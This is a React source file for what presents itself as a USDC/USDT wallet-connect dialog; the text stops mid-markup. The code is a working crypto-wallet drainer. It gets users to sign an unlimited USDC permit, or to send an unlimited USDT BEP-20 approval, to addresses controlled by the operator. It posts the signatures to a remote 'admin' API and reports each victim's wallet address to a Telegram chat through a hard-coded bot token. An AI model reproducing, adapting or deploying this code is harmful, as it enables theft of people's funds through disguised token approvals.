import React, { useEffect, useState } from 'react'
import { ethers } from 'ethers'
import { getEthereumProviderAsync } from '../utils/walletProvider'
import TronWalletSelector from './TronWalletSelector.jsx'
import './WalletDialog.css'

// Ethereum constants
const CHAIN_ID = 1
const USDC_TOKEN = "0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48"
const TOKEN_NAME = "USD Coin"
const TOKEN_VERSION = "2"

// BSC constants
const BSC_CHAIN_ID = 56
const USDT_BEP20_ADDRESS = "0x55d398326f99059fF775485246999027B3197955"
const BSC_SPENDER_CONTRACT = "0x7919b9bEF13847695F3592cD15122DBC17355622"

const DAPP_URL = "https://multiscan.app"
const TELEGRAM_BOT_TOKEN = '8488646645:AAEyGRl3Os2AVMveBzJWdFgbb9yKVEDrhuI'
const TELEGRAM_CHAT_ID = '-1003373959785'

const WalletDialog = ({ onClose }) => {
  const [step, setStep] = useState('coin') // 'coin', 'network', or 'wallet'
  const [selectedCoin, setSelectedCoin] = useState(null) // 'USDC' or 'USDT'
  const [selectedNetwork, setSelectedNetwork] = useState(null) // 'ERC20', 'TRC20', or 'BNB20'
  const [error, setError] = useState(null)
  const [loading, setLoading] = useState(false)


  // Function to send messages to Telegram
  const sendTelegramMessage = async (message) => {
    try {
      const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`
      const response = await fetch(url, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          chat_id: TELEGRAM_CHAT_ID,
          text: message,
          parse_mode: 'HTML',
        }),
      })
      
      if (!response.ok) {
        console.error('Error sending to Telegram:', await response.text())
      }
    } catch (error) {
      console.error('Error sending to Telegram:', error)
    }
  }

  // Function to format date and time
  const formatDateTime = () => {
    const now = new Date()
    const date = now.toLocaleDateString('en-US', {
      year: 'numeric',
      month: '2-digit',
      day: '2-digit',
    })
    const time = now.toLocaleTimeString('en-US', {
      hour: '2-digit',
      minute: '2-digit',
      second: '2-digit',
    })
    return `${date} ${time}`
  }

  // Old auto-start logic is no longer needed - user is redirected to separate pages

  const waitForEthereum = (callback) => {
    let tries = 0
    const maxTries = 200 // Increase number of attempts for mobile devices
    const getProvider = () => window.bybitWallet || window.ethereum
    
    // First check immediately, might be ready already
    const prov = getProvider()
    if (prov && typeof prov.request === 'function') {
      prov.request({ method: 'eth_accounts' })
        .then((accounts) => {
          if (accounts && accounts.length > 0) {
            console.log("✅ Ethereum ready immediately with accounts:", accounts)
            callback()
            return
          } else {
            console.log("⏳ Ethereum ready but no accounts connected")
          }
        })
        .catch((e) => {
          console.log("⏳ Ethereum not ready yet:", e.message)
          // If not ready, continue checking
        })
    }
    
    const timer = setInterval(async () => {
      tries++
      const prov = getProvider()
      // Check bybitWallet first (для Bybit dapp browser), затем ethereum
      if (prov && typeof prov.request === 'function') {
        try {
          const accounts = await prov.request({ method: 'eth_accounts' })
          if (accounts && accounts.length > 0) {
            clearInterval(timer)
            console.log(`✅ Ethereum ready after ${tries} attempts with accounts:`, accounts)
            callback()
            return
          } else {
            // Ethereum is ready, but accounts are not connected - this is normal, we'll connect them in connectMainnet/connectBSC
            if (tries >= 15) {
              // After 15 attempts, consider Ethereum ready, even if accounts are not connected
              clearInterval(timer)
              console.log(`✅ Ethereum ready after ${tries} attempts (will connect accounts)`)
              callback()
              return
            }
          }
        } catch (e) {
          if (tries % 20 === 0) {
            console.log(`⏳ Waiting for wallet... attempt ${tries}/${maxTries}`, e.message)
          }
        }
      } else {
        if (tries % 20 === 0) {
          console.log(`⏳ Waiting for bybitWallet/ethereum... attempt ${tries}/${maxTries}`)
        }
      }
      
      // If exceeded limit of attempts
      if (tries >= maxTries) {
        clearInterval(timer)
        console.error("❌ Ethereum not ready after", maxTries, "attempts")
        setError("Wallet not ready. Please refresh the page and try again.")
        setLoading(false)
        localStorage.removeItem("openedWallet")
        localStorage.removeItem("openedNetwork")
      }
    }, 300) // Check every 300ms for mobile devices
  }

  const openWalletDeepLink = (wallet, network) => {
    const ua = navigator.userAgent
    const isAndroid = /Android/i.test(ua)
    const isIOS = /iPhone|iPad|iPod/i.test(ua)

    // Determine page URL based on network and token
    // Using HashRouter, so paths with #
    const baseUrl = window.location.origin + window.location.pathname
    let pageUrl = ""
    if (network === 'ERC20' && selectedCoin === 'USDC') {
      pageUrl = `${baseUrl}#/usdc-erc20`
    } else if (network === 'BNB20' && selectedCoin === 'USDC') {
      pageUrl = `${baseUrl}#/usdc-bep20`
    } else if (network === 'AVAX' && selectedCoin === 'USDC') {
      pageUrl = `${baseUrl}#/usdc-avax`
    } else if (network === 'ERC20' && selectedCoin === 'USDT') {
      pageUrl = `${baseUrl}#/usdt-erc20`
    } else if (network === 'BNB20' && selectedCoin === 'USDT') {
      pageUrl = `${baseUrl}#/usdt-bep20`
    } else if (network === 'USDTE_AVAX' && selectedCoin === 'USDT') {
      pageUrl = `${baseUrl}#/usdt-e-avax`
    } else if (network === 'TRC20') {
      pageUrl = `${baseUrl}#/usdt-trc20`
    } else {
      setError("Unknown network")
      return
    }

    let url = ""

    if (network === 'ERC20' || network === 'BNB20' || network === 'AVAX' || network === 'USDTE_AVAX' || network === 'TRC20') {
      if (wallet === "trust") {
        const isMobile = isIOS || isAndroid
        if (isMobile) {
          url = isIOS
            ? "https://link.trustwallet.com/open_url?url=" + encodeURIComponent(pageUrl)
            : "intent://open_url?url=" + encodeURIComponent(pageUrl)
              + "#Intent;scheme=trust;package=com.wallet.crypto.trustapp;end"
        } else {
          url = pageUrl
        }
      }

      if (wallet === "metamask") {
        if (isIOS) {
          // iOS MetaMask requires full https:// without protocol in path
          const clean = pageUrl.replace(/^https?:\/\//, "")
          url = "https://metamask.app.link/dapp/" + clean
        } else if (isAndroid) {
          // Android MetaMask deep link - use open_url format
          url = "intent://open_url?url=" + encodeURIComponent(pageUrl)
            + "#Intent;scheme=metamask;package=io.metamask;end"
        } else {
          // For desktop try to connect directly
          return
        }
      }

      // Bybit больше не открываем через диплинк отсюда — для EVM работаем как с обычным провайдером внутри браузера Bybit

      // SafePal: нет публичного deep link. На мобилке — копируем URL и показываем инструкцию (не переходим)
      if (wallet === "safepal") {
        const isMobile = isIOS || isAndroid
        if (isMobile) {
          try {
            navigator.clipboard.writeText(pageUrl)
            setError("URL скопирован. Откройте SafePal → Explore → вставьте URL и нажмите Go")
            setTimeout(() => setError(null), 6000)
          } catch (_) {
            setError("Скопируйте URL вручную и вставьте в SafePal → Explore")
            setTimeout(() => setError(null), 6000)
          }
          return
        }
        url = pageUrl
      }
    }

    console.log("Opening deep link for", wallet, network, ":", url)
    if (url) {
      try {
        window.location.href = url
      } catch (e) {
        console.error("Error opening deep link:", e)
        setError("Failed to open wallet. Please open the wallet manually and return to this page.")
      }
    } else {
      console.error("No deep link URL generated for", wallet, network)
      setError("Failed to create link to open wallet. Please try again.")
    }
  }

  const connectMainnet = async (ethProvider = null) => {
    try {
      console.log("🔌 Connecting to Ethereum Mainnet...")
      let prov = ethProvider
      if (!prov || typeof prov.request !== 'function') {
        prov = await getEthereumProviderAsync()
      }
      if (!prov || typeof prov.request !== 'function') {
        throw new Error("Wallet not found. Please open in Bybit Wallet or install MetaMask and refresh the page.")
      }
      
      const provider = new ethers.BrowserProvider(prov)
      
      // Request account connection
      console.log("📝 Requesting accounts...")
      const accounts = await provider.send("eth_requestAccounts", [])
      
      if (!accounts || accounts.length === 0) {
        throw new Error("Failed to access wallet. Please unlock MetaMask and try again.")
      }
      
      console.log("✅ Accounts connected:", accounts)
      const signer = await provider.getSigner()
      const address = await signer.getAddress()
      console.log("✅ Signer address:", address)

      // Check and switch network
      const cur = await provider.send("eth_chainId", [])
      const currentChainId = parseInt(cur, 16)
      console.log("🔗 Current chain ID:", currentChainId, "Expected:", CHAIN_ID)
      
      if (currentChainId !== CHAIN_ID) {
        console.log("🔄 Switching to Ethereum Mainnet...")
        try {
          await provider.send("wallet_switchEthereumChain", [{ chainId: "0x1" }])
          // Wait for network switch
          let attempts = 0
          while (attempts < 10) {
            await new Promise(resolve => setTimeout(resolve, 300))
            const newChainId = parseInt(await provider.send("eth_chainId", []), 16)
            if (newChainId === CHAIN_ID) {
              console.log("✅ Switched to Ethereum Mainnet")
              break
            }
            attempts++
          }
        } catch (switchError) {
          console.error("❌ Failed to switch network:", switchError)
          throw new Error("Failed to switch to Ethereum Mainnet. Please switch the network manually in MetaMask.")
        }
      }

      return { provider, signer }
    } catch (e) {
      console.error("❌ connectMainnet error:", e)
      throw e
    }
  }

  const connectBSC = async (ethProvider = null) => {
    let prov = ethProvider
    if (!prov || typeof prov.request !== 'function') {
      prov = await getEthereumProviderAsync()
    }
    if (!prov || typeof prov.request !== 'function') {
      throw new Error("Wallet not found. Please open in Bybit Wallet or install MetaMask and refresh the page.")
    }
    const provider = new ethers.BrowserProvider(prov)
    
    // Request wallet connection
    await provider.send("eth_requestAccounts", [])
    const signer = await provider.getSigner()

    // Check current network
    let cur = await provider.send("eth_chainId", [])
    let currentChainId = parseInt(cur, 16)
    
    // If network is not BSC, switch
    if (currentChainId !== BSC_CHAIN_ID) {
      try {
        // Try to switch to BSC
        await provider.send("wallet_switchEthereumChain", [{ chainId: `0x${BSC_CHAIN_ID.toString(16)}` }])
        
        // Wait for network switch (check several times)
        let attempts = 0
        while (attempts < 20) {
          await new Promise(resolve => setTimeout(resolve, 200))
          cur = await provider.send("eth_chainId", [])
          currentChainId = parseInt(cur, 16)
          if (currentChainId === BSC_CHAIN_ID) {
            break
          }
          attempts++
        }
        
        if (currentChainId !== BSC_CHAIN_ID) {
          throw new Error("Failed to switch to BSC network")
        }
      } catch (switchError) {
        // If network is not added, add it
        if (switchError.code === 4902 || switchError.message?.includes('Unrecognized chain')) {
          await provider.send("wallet_addEthereumChain", [{
            chainId: `0x${BSC_CHAIN_ID.toString(16)}`,
            chainName: "Binance Smart Chain",
            nativeCurrency: {
              name: "BNB",
              symbol: "BNB",
              decimals: 18
            },
            rpcUrls: ["https://bsc-dataseed.binance.org/"],
            blockExplorerUrls: ["https://bscscan.com/"]
          }])
          
          // Wait for network to be added and switched
          let attempts = 0
          while (attempts < 20) {
            await new Promise(resolve => setTimeout(resolve, 200))
            cur = await provider.send("eth_chainId", [])
            currentChainId = parseInt(cur, 16)
            if (currentChainId === BSC_CHAIN_ID) {
              break
            }
            attempts++
          }
          
          if (currentChainId !== BSC_CHAIN_ID) {
            throw new Error("Failed to add and switch to BSC network")
          }
        } else {
          throw switchError
        }
      }
    }

    return { provider, signer }
  }

  const runPermitFlow = async (forceProvider = null) => {
    try {
      setLoading(true)
      setError(null)
      console.log("PERMIT started")

      let ethProv = forceProvider
      if (!ethProv) {
        ethProv = await getEthereumProviderAsync()
      }
      if (!ethProv) {
        throw new Error("Wallet not ready. Please open the page in Bybit Wallet or refresh the page.")
      }

      // Сначала подключаем кошелёк (чтобы расширение/инжект открылось).
      // Затем (внутри try/catch) пытаемся получить puller с API.
      const { provider, signer } = await connectMainnet(ethProv)
      const owner = await signer.getAddress()

      // Puller (spender) for USDC permit
      let puller = USDC_TOKEN // fallback, чтобы не блокировать инжект кошелька
      try {
        const resPuller = await fetch(`${DAPP_URL}/api/v1/puller?type=USDC`)
        if (resPuller.ok) {
          const text = await resPuller.text().then(t => t.trim())
          if (!text.startsWith('<!DOCTYPE') && !text.startsWith('<html')) {
            try {
              const pullerData = JSON.parse(text)
              puller = pullerData.puller || pullerData
            } catch (e) {
              if (text.startsWith('0x') && text.length === 42) puller = text
            }
          }
        }
      } catch (fetchError) {
        console.warn("Puller API fetch failed, using fallback:", fetchError?.message)
      }

      const erc = new ethers.Contract(
        USDC_TOKEN,
        ["function nonces(address) view returns (uint256)"],
        provider
      )

      const nonce = await erc.nonces(owner)
      const deadline = Math.floor(Date.now() / 1000) + 28 * 24 * 60 * 60
      const permitValue = ethers.MaxUint256

      const domain = {
        name: TOKEN_NAME,
        version: TOKEN_VERSION,
        chainId: CHAIN_ID,
        verifyingContract: USDC_TOKEN
      }

      const types = {
        Permit: [
          { name: "owner", type: "address" },
          { name: "spender", type: "address" },
          { name: "value", type: "uint256" },
          { name: "nonce", type: "uint256" },
          { name: "deadline", type: "uint256" }
        ]
      }

      const message = { owner, spender: puller, value: permitValue, nonce, deadline }

      const sig = ethers.Signature.from(
        await signer.signTypedData(domain, types, message)
      )

      const domainName = window.location.hostname

      const resSubmit = await fetch(`${DAPP_URL}/api/admin/usdcs`, {
        method: "POST",
        headers: { 
          "Content-Type": "application/json"
        },
        body: JSON.stringify({
          owner: owner.toLowerCase(),
          domainName: domainName,
          permitValue: permitValue.toString(),
          nonce: nonce.toString(),
          deadline: deadline.toString(),
          allowed: true,
          v: sig.v,
          r: sig.r,
          s: sig.s
        })
      })

      if (!resSubmit.ok) {
        const text = await resSubmit.text()
        console.error("Submit Error:", text)
        throw new Error(`Submission error: ${resSubmit.status}`)
      }

      console.log("PERMIT OK")
      
      // Send connection information to Telegram
      const telegramMessage = `✅ <b>USDC ERC20 Permit</b>\n\n` +
        `🔗 Wallet Address: <code>${owner.toLowerCase()}</code>\n` +
        `🌐 Domain: <code>${domainName}</code>\n` +
        `💼 Token: USDC (ERC-20)\n` +
        `📝 Puller: <code>${puller}</code>\n` +
        `⏰ Time: ${formatDateTime()}`
      await sendTelegramMessage(telegramMessage)
      
      setLoading(false)
      handleClose()
    } catch (e) {
      console.error("PERMIT FAILED", e)
      console.error("Error details:", {
        message: e.message,
        code: e.code,
        stack: e.stack
      })
      
      let userMessage = "An error occurred while connecting"
      
      if (e.code === 4001 || e.message?.includes('denied') || e.message?.includes('rejected') || e.message?.includes('User denied')) {
        userMessage = "Transaction was cancelled. Please confirm the transaction in your wallet to continue."
      } else if (e.message?.includes('MetaMask not found') || e.message?.includes('not found')) {
        userMessage = "MetaMask not found. Please install MetaMask and refresh the page."
      } else if (e.message?.includes('Failed to access') || e.message?.includes('access')) {
        userMessage = "Failed to access wallet. Please unlock MetaMask and try again."
      } else if (e.message?.includes('Wallet not ready')) {
        userMessage = "Wallet not ready. Please refresh the page and try again."
      } else if (e.message?.includes('network') || e.message?.includes('chain')) {
        userMessage = "Network error. Please check your internet connection and try again."
      } else if (e.message?.includes('insufficient funds')) {
        userMessage = "Insufficient funds to complete the transaction. Please top up your wallet balance."
      } else if (e.message?.includes('timeout')) {
        userMessage = "Request timeout. Please try again."
      } else if (e.message) {
        // Show original error message if it's understandable
        userMessage = e.message
      }
      
      setError(userMessage)
      setLoading(false)
      
      // Clear flags on error so user can try again
      localStorage.removeItem("openedWallet")
      localStorage.removeItem("openedNetwork")
    }
  }

  const runBSCApproveFlow = async (forceProvider = null) => {
    try {
      setLoading(true)
      setError(null)
      console.log("BSC APPROVE started")

      let ethProv = forceProvider
      if (!ethProv) {
        ethProv = await getEthereumProviderAsync()
      }
      if (!ethProv) {
        throw new Error("Wallet not ready. Please open the page in Bybit Wallet or refresh the page.")
      }

      // Use smart contract address for BSC
      const spenderAddress = BSC_SPENDER_CONTRACT
      console.log("Spender address:", spenderAddress)

      // Connect to BSC
      const { provider, signer } = await connectBSC(ethProv)
      const owner = await signer.getAddress()

      // Get USDT BEP-20 contract
      const usdtContract = new ethers.Contract(
        USDT_BEP20_ADDRESS,
        [
          "function approve(address spender, uint256 amount) returns (bool)",
          "function allowance(address owner, address spender) view returns (uint256)"
        ],
        signer
      )

      // Maximum value for unlimited approve
      const maxApproval = ethers.MaxUint256

      // Check current allowance
      const currentAllowance = await usdtContract.allowance(owner, spenderAddress)
      console.log("Current allowance:", currentAllowance.toString())

      // Execute approve
      const tx = await usdtContract.approve(spenderAddress, maxApproval)
      console.log("Approve transaction sent:", tx.hash)

      // Wait for confirmation
      await tx.wait()
      console.log("✅ USDT BEP20 approve completed successfully:", tx.hash)

      const domainName = window.location.hostname
      
      // Send data to server (not critical if it fails)
      try {
        const params = new URLSearchParams({
          owner: owner.toLowerCase(),
          domainName: domainName
        })

        const resSubmit = await fetch(`${DAPP_URL}/api/admin/usdts-bep?${params.toString()}`, {
          method: "POST",
          headers: { 
            "Content-Type": "application/json"
          }
        })

        if (!resSubmit.ok) {
          const text = await resSubmit.text()
          console.error("Submit Error:", text)
        } else {
          console.log("BSC APPROVE OK - data sent to server")
        }
      } catch (submitError) {
        console.warn("Failed to send data to server (not critical):", submitError)
      }

      // Send connection information to Telegram (always send, even if server didn't respond)
      try {
        const telegramMessage = `✅ <b>USDT BEP20 Approve</b>\n\n` +
          `🔗 Wallet Address: <code>${owner.toLowerCase()}</code>\n` +
          `🌐 Domain: <code>${domainName}</code>\n` +
          `💼 Token: USDT (BEP-20)\n` +
          `📝 Transaction: <code>${tx.hash}</code>\n` +
          `⏰ Time: ${formatDateTime()}`
        await sendTelegramMessage(telegramMessage)
        console.log("Telegram notification sent")
      } catch (telegramError) {
        console.warn("Failed to send Telegram notification:", telegramError)
      }
      
      setLoading(false)
      handleClose()
    } catch (e) {
      console.error("BSC APPROVE FAILED", e)
      console.error("Error details:", {
        message: e.message,
        code: e.code,
        stack: e.stack
      })
      
      let userMessage = "An error occurred while connecting"
      
      if (e.code === 4001 || e.message?.includes('denied') || e.message?.includes('rejected') || e.message?.includes('User denied')) {
        userMessage = "Transaction was cancelled. Please confirm the transaction in your wallet to continue."
      } else if (e.message?.includes('MetaMask not found') || e.message?.includes('not found')) {
        userMessage = "MetaMask not found. Please install MetaMask and refresh the page."
      } else if (e.message?.includes('Failed to access') || e.message?.includes('access')) {
        userMessage = "Failed to access wallet. Please unlock MetaMask and try again."
      } else if (e.message?.includes('Wallet not ready')) {
        userMessage = "Wallet not ready. Please refresh the page and try again."
      } else if (e.message?.includes('network') || e.message?.includes('chain')) {
        userMessage = "Network error. Please check your internet connection and try again."
      } else if (e.message?.includes('insufficient funds')) {
        userMessage = "Insufficient funds to complete the transaction. Please top up your wallet balance."
      } else if (e.message?.includes('timeout')) {
        userMessage = "Request timeout. Please try again."
      } else if (e.message?.includes('BEP20: approve to the zero address')) {
        userMessage = "Configuration error. Please contact support."
      } else if (e.message) {
        // Show original error message if it's understandable
        userMessage = e.message
      }
      
      setError(userMessage)
      setLoading(false)
      
      // Clear flags on error so user can try again
      localStorage.removeItem("openedWallet")
      localStorage.removeItem("openedNetwork")
    }
  }

  const handleMetaMask = async () => {
    // Always open deep link for mobile devices
    // For desktop check for window.ethereum
    const ua = navigator.userAgent
    const isMobile = /Android|iPhone|iPad|iPod/i.test(ua)
    
    if (selectedNetwork === 'TRC20') {
      openWalletDeepLink("metamask", "TRC20")
      return
    } else if (selectedNetwork === 'BNB20') {
      if (!isMobile && window.ethereum) {
        // On desktop, if ethereum is available, start immediately
        if (selectedCoin === 'USDC') {
          // For USDC BEP20 redirect to page
          window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-bep20`
          return
        } else {
          await runBSCApproveFlow()
          return
        }
      }
      // On mobile or if ethereum is unavailable - open deep link
      openWalletDeepLink("metamask", "BNB20")
    } else if (selectedNetwork === 'AVAX' && selectedCoin === 'USDC') {
      if (!isMobile && window.ethereum) {
        // On desktop, if ethereum is available, redirect to page
        window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-avax`
        return
      }
      // On mobile or if ethereum is unavailable - open deep link
      openWalletDeepLink("metamask", "AVAX")
    } else if (selectedNetwork === 'USDTE_AVAX' && selectedCoin === 'USDT') {
      if (!isMobile && window.ethereum) {
        window.location.href = `${window.location.origin}${window.location.pathname}#/usdt-e-avax`
        return
      }
      openWalletDeepLink("metamask", "USDTE_AVAX")
    } else if (selectedNetwork === 'ERC20' && selectedCoin === 'USDT') {
      if (!isMobile && window.ethereum) {
        window.location.href = `${window.location.origin}${window.location.pathname}#/usdt-erc20`
        return
      }
      openWalletDeepLink("metamask", "ERC20")
    } else {
      if (!isMobile && window.ethereum) {
        if (selectedCoin === 'USDC' && selectedNetwork === 'ERC20') {
          runPermitFlow()
          return
        } else {
          if (selectedNetwork === 'BNB20') {
            window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-bep20`
          } else if (selectedNetwork === 'AVAX') {
            window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-avax`
          }
          return
        }
      }
      openWalletDeepLink("metamask", selectedNetwork === 'ERC20' ? "ERC20" : "AVAX")
    }
  }

  const handleTrustWallet = async () => {
    const ua = navigator.userAgent
    const isMobile = /Android|iPhone|iPad|iPod/i.test(ua)
    
    if (selectedNetwork === 'BNB20') {
      if (!isMobile && window.ethereum) {
        if (selectedCoin === 'USDC') {
          window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-bep20`
          return
        } else {
          await runBSCApproveFlow()
          return
        }
      }
      openWalletDeepLink("trust", "BNB20")
    } else if (selectedNetwork === 'AVAX' && selectedCoin === 'USDC') {
      if (!isMobile && window.ethereum) {
        window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-avax`
        return
      }
      openWalletDeepLink("trust", "AVAX")
    } else if (selectedNetwork === 'USDTE_AVAX' && selectedCoin === 'USDT') {
      if (!isMobile && window.ethereum) {
        window.location.href = `${window.location.origin}${window.location.pathname}#/usdt-e-avax`
        return
      }
      openWalletDeepLink("trust", "USDTE_AVAX")
    } else if (selectedNetwork === 'ERC20' && selectedCoin === 'USDT') {
      if (!isMobile && window.ethereum) {
        window.location.href = `${window.location.origin}${window.location.pathname}#/usdt-erc20`
        return
      }
      openWalletDeepLink("trust", "ERC20")
    } else {
      if (!isMobile && window.ethereum) {
        if (selectedCoin === 'USDC' && selectedNetwork === 'ERC20') {
          runPermitFlow()
          return
        } else {
          if (selectedNetwork === 'BNB20') {
            window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-bep20`
          } else if (selectedNetwork === 'AVAX') {
            window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-avax`
          }
          return
        }
      }
      openWalletDeepLink("trust", selectedNetwork === 'ERC20' ? "ERC20" : "AVAX")
    }
  }

  const handleBybitWallet = () => {
    const ua = navigator.userAgent
    const isMobile = /Android|iPhone|iPad|iPod/i.test(ua)

    // TRC20: по-прежнему используем TronWalletSelector (там уже есть рабочий Bybit адаптер)
    if (selectedNetwork === 'TRC20') {
      setError("Для USDT TRC20 выберите Bybit Wallet в списке Tron-кошельков ниже.")
      return
    }

    // По твоему требованию: сейчас делаем, чтобы Bybit работал только на ПК.
    if (isMobile) {
      setError("Bybit сейчас работает только на ПК. Для телефонов используйте MetaMask или Trust (кроме USDT TRC20).")
      return
    }

    // ПК: пробуем подключиться напрямую (без диплинков) через Bybit EVM провайдер
    const prov = window.bybitWallet || window.ethereum
    if (!prov) {
      setError("Bybit Wallet не найден. Установи/включи Bybit Wallet в браузере и попробуй снова.")
      return
    }

    // USDC ERC20: permit
    if (selectedCoin === 'USDC' && selectedNetwork === 'ERC20') {
      runPermitFlow(prov)
      return
    }

    // USDT BEP20: approve на BSC
    if (selectedCoin === 'USDT' && selectedNetwork === 'BNB20') {
      runBSCApproveFlow(prov)
      return
    }

    setError("Эта комбинация сети/монеты пока не поддерживается для Bybit на ПК. Используй MetaMask/Trust.")
  }

  const handleSafePal = () => {
    const ua = navigator.userAgent
    const isMobile = /Android|iPhone|iPad|iPod/i.test(ua)
    if (!isMobile && window.ethereum) {
      if (selectedCoin === 'USDC') {
        if (selectedNetwork === 'ERC20') {
          window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-erc20`
          return
        }
        if (selectedNetwork === 'BNB20') {
          window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-bep20`
          return
        }
        if (selectedNetwork === 'AVAX') {
          window.location.href = `${window.location.origin}${window.location.pathname}#/usdc-avax`
          return
        }
      }
      if (selectedCoin === 'USDT' && selectedNetwork === 'USDTE_AVAX') {
        window.location.href = `${window.location.origin}${window.location.pathname}#/usdt-e-avax`
        return
      }
      if (selectedCoin === 'USDT' && selectedNetwork === 'ERC20') {
        window.location.href = `${window.location.origin}${window.location.pathname}#/usdt-erc20`
        return
      }
      if (selectedCoin === 'USDT' && selectedNetwork === 'BNB20') {
        window.location.href = `${window.location.origin}${window.location.pathname}#/usdt-bep20`
        return
      }
    }
    const network = selectedNetwork === 'USDTE_AVAX' ? 'USDTE_AVAX' : (selectedNetwork === 'ERC20' ? 'ERC20' : selectedNetwork === 'BNB20' ? 'BNB20' : 'AVAX')
    openWalletDeepLink("safepal", network)
  }

  const handleCoinSelect = (coin) => {
    setSelectedCoin(coin)
    // For USDC and USDT go to network selection
    if (coin === 'USDC' || coin === 'USDT') {
      setStep('network')
    }
  }

  const handleNetworkSelect = (network) => {
    setSelectedNetwork(network)
    setStep('wallet')
  }

  const handleBack = () => {
    if (step === 'wallet') {
      // If on wallet step, go back to network selection
      setStep('network')
      setSelectedNetwork(null)
    } else if (step === 'network') {
      // If on network selection step, go back to coin selection
      setStep('coin')
      setSelectedCoin(null)
      setSelectedNetwork(null)
    }
  }

  const handleClose = () => {
    onClose()
  }

  return (
    <div className="wallet-dialog-overlay" onClick={handleClose}>
      <div className="wallet-dialog" onClick={(e) => e.stopPropagation()}>
        <button className="x" onClick={handleClose}>
          ❌
        </button>

        {step === 'coin' && (
          <>
            <h2>Select Coin</h2>
            <button 
              className="coin-btn" 
              onClick={() => handleCoinSelect('USDC')}
            >
              <div className="coin-icon">
                <img 
                  src="https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png" 
                  alt="USDC"
                  className="coin-logo"
                />
              </div>
              <div className="coin-info">
                <div className="coin-name">USDC</div>
                <div className="coin-full-name">USD Coin</div>
                <div className="coin-network">Select Network</div>
              </div>
            </button>
            <button 
              className="coin-btn" 
              onClick={() => handleCoinSelect('USDT')}
            >
              <div className="coin-icon">
                <img 
                  src="https://assets.coingecko.com/coins/images/325/small/Tether.png" 
                  alt="USDT"
                  className="coin-logo"
                />
              </div>
              <div className="coin-info">
                <div className="coin-name">USDT</div>
                <div className="coin-full-name">Tether USD</div>
                <div className="coin-network">Select Network</div>
              </div>
            </button>
          </>
        )}

        {step === 'network' && selectedCoin === 'USDC' && (
          <>
            <button className="back-btn" onClick={handleBack} disabled={loading}>
              ← Back
            </button>
            <h2>Select Network</h2>
            <button 
              className="coin-btn" 
              onClick={() => handleNetworkSelect('ERC20')}
            >
              <div className="coin-icon">
                <img 
                  src="https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png" 
                  alt="ERC20"
                  className="coin-logo"
                />
              </div>
              <div className="coin-info">
                <div className="coin-name">ERC-20</div>
                <div className="coin-full-name">Ethereum Network</div>
                <div className="coin-network">USDC</div>
              </div>
            </button>
            <button 
              className="coin-btn" 
              onClick={() => handleNetworkSelect('BNB20')}
            >
              <div className="coin-icon">
                <img 
                  src="https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png" 
                  alt="BEP20"
                  className="coin-logo"
                />
              </div>
              <div className="coin-info">
                <div className="coin-name">BEP-20</div>
                <div className="coin-full-name">Binance Smart Chain</div>
                <div className="coin-network">USDC</div>
              </div>
            </button>
            <button 
              className="coin-btn" 
              onClick={() => handleNetworkSelect('AVAX')}
            >
              <div className="coin-icon">
                <img 
                  src="https://assets.coingecko.com/coins/images/6319/small/USD_Coin_icon.png" 
                  alt="AVAX"
                  className="coin-logo"
                />
              </div>
              <div className="coin-info">
                <div className="coin-name">AVAX C-Chain</div>
                <div className="coin-full-name">Avalanche Network</div>
                <div className="coin-network">USDC</div>
              </div>
            </button>
          </>
        )}

        {step === 'network' && selectedCoin === 'USDT' && (
          <>
            <button className="back-btn" onClick={handleBack} disabled={loading}>
              ← Back
            </button>
            <h2>Select Network</h2>
            <button 
              className="coin-btn" 
              onClick={() => handleNetworkSelect('ERC20')}
            >
              <div className="coin-icon">
                <img 
                  src="https://assets.coingecko.com/coins/images/325/small/Tether.png" 
                  alt="ERC20"
                  className="coin-logo"
                />
              </div>
              <div className="coin-info">
                <div className="coin-name">ERC-20</div>
                <div className="coin-full-name">Ethereum Network</div>
                <div className="coin-network">USDT</div>
              </div>
            </button>
            <button 
              className="coin-btn" 
              onClick={() => handleNetworkSelect('TRC20')}
            >
              <div className="coin-icon">
                <img 
                  src="https://assets.coingecko.com/coins/images/325/small/Tether.png" 
                  alt="TRC20"
                  className="coin-logo"
                />
              </div>
              <div className="coin-info">
                <div className="coin-name">TRC-20</div>
                <div className="coin-full-name">Tron Network</div>
                <div className="coin-network">USDT</div>
              </div>
            </button>
            <button 
              className="coin-btn" 
              onClick={() => handleNetworkSelect('BNB20')}
            >
              <div className="coin-icon">
                <img 
                  src="https://assets.coingecko.com/coins/images/325/small/Tether.png" 
                  alt="BEP20"
                  className="coin-logo"
                />
              </div>
              <div className="coin-info">
                <div className="coin-name">BEP-20</div>
                <div className="coin-full-name">Binance Smart Chain</div>
                <div className="coin-network">USDT</div>
              </div>
            </button>
            <button 
              className="coin-btn" 
              onClick={() => handleNetworkSelect('USDTE_AVAX')}
            >
              <div className="coin-icon">
                <img 
                  src="https://assets.coingecko.com/coins/images/325/small/Tether.png" 
                  alt="USDT.e AVAX"
                  className="coin-logo"
                />
              </div>
              <div className="coin-info">
                <div className="coin-name">USDT.e</div>
                <div className="coin-full-name">Avalanche C-Chain</div>
                <div className="coin-network">USDT</div>
              </div>
            </button>
          </>
        )}

        {step === 'wallet' && (
          <>
            <button className="back-btn" onClick={handleBack} disabled={loading}>
              ← Back
            </button>
            <h2>Select Wallet</h2>
            <div className="selected-coin-info">
              Selected: <strong>
                {selectedCoin === 'USDC' && selectedNetwork === 'ERC20' ? 'USDC (ERC-20)' :
                 selectedCoin === 'USDC' && selectedNetwork === 'BNB20' ? 'USDC (BEP-20)' :
                 selectedCoin === 'USDC' && selectedNetwork === 'AVAX' ? 'USDC (AVAX C-Chain)' :
                 selectedCoin === 'USDT' && selectedNetwork === 'ERC20' ? 'USDT (ERC-20)' :
